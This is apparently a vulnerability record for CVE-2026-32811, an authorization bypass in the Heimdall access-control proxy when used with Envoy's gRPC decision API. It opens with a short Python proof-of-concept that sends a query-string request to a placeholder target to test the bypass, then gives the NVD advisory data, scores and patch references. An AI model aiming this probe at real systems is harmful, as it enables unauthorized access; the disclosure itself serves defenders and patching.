CVE-2026-32811

# PoC Concept: Send a request with query parameters intended to bypass path matching # Target: A Heimdall protected endpoint via Envoy import requests target_url = "http://target.example.com/protected/resource?malicious=param" # Send the request # Envoy splits this. Path becomes "/protected/resource", Query becomes "malicious=param". # Envoy gRPC API sends path field as "/protected/resource?malicious=param" (depending on config) or similar. # Heimdall encodes '?' -> '%3F'. # Rule for "/protected/resource" fails to match. # If default rule is allow, access is granted. response = requests.get(target_url) if response.status_code == 200: print("[+] Potential bypass successful!") else: print("[-] Request blocked or failed")

{"cve": {"id": "CVE-2026-32811", "sourceIdentifier": "[email protected]", "published": "2026-03-20T02:16:34.857", "lastModified": "2026-03-30T15:01:22.760", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Heimdall is a cloud native Identity Aware Proxy and Access Control Decision service. When using Heimdall in envoy gRPC decision API mode with versions 0.7.0-alpha through 0.17.10, wrong encoding of the query URL string allows rules with non-wildcard path expressions to be bypassed. Envoy splits the requested URL into parts, and sends the parts individually to Heimdall. Although query and path are present in the API, the query field is documented to be always empty and the URL query is included in the path field. The implementation uses go's url library to reconstruct the url which automatically encodes special characters in the path. As a consequence, a parameter like /mypath?foo=bar to Path is escaped into /mypath%3Ffoo=bar. Subsequently, a rule matching /mypath no longer matches and is bypassed. The issue can only lead to unintended access if Heimdall is configured with an \"allow all\" default rule. Since v0.16.0, Heimdall enforces secure defaults and refuses to start with such a configuration unless this enforcement is explicitly disabled, e.g. via --insecure-skip-secure-default-rule-enforcement or the broader --insecure flag. This issue has been fixed in version 0.17.11."}, {"lang": "es", "value": "Heimdall es un Proxy Consciente de la Identidad y un servicio de decisión de control de acceso nativo de la nube. Al usar Heimdall en modo API de decisión gRPC de Envoy con las versiones 0.7.0-alpha hasta 0.17.10, una codificación incorrecta de la cadena de URL de consulta permite que se eludan reglas con expresiones de ruta sin comodines. Envoy divide la URL solicitada en partes y envía las partes individualmente a Heimdall. Aunque la consulta y la ruta están presentes en la API, el campo de consulta está documentado para estar siempre vacío y la consulta de la URL se incluye en el campo de ruta. La implementación utiliza la biblioteca url de Go para reconstruir la URL, lo que codifica automáticamente los caracteres especiales en la ruta. Como consecuencia, un parámetro como /mypath?foo=bar a Path se escapa a /mypath%3Ffoo=bar. Posteriormente, una regla que coincide con /mypath ya no coincide y es eludida. El problema solo puede conducir a un acceso no intencionado si Heimdall está configurado con una regla predeterminada de 'permitir todo'. Desde la v0.16.0, Heimdall aplica valores predeterminados seguros y se niega a iniciar con dicha configuración a menos que esta aplicación se deshabilite explícitamente, p. ej., a través de --insecure-skip-secure-default-rule-enforcement o la bandera más amplia --insecure. Este problema ha sido solucionado en la versión 0.17.11."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-116"}, {"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dadrus:heimdall:*:*:*:*:*:*:*:*", "versionStartIncluding": "0.7.0", "versionEndExcluding": "0.17.11", "matchCriteriaId": "7FC50B38-5B44-4237-B80D-7C6BC29FFC0C"}]}]}], "references": [{"url": "https://github.com/dadrus/heimdall/commit/50321b3007db1ccafdc6b1cfd6bdc3689c19a502", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/dadrus/heimdall/pull/3106", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/dadrus/heimdall/security/advisories/GHSA-r8x2-fhmf-6mxp", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/envoyproxy/envoy/blob/105b4acd422d67fcff908ec38d91c7676d079939/api/envoy/service/auth/v3/attribute_context.proto#L146-L147", "source": "[email protected]", "tags": ["Patch"]}]}}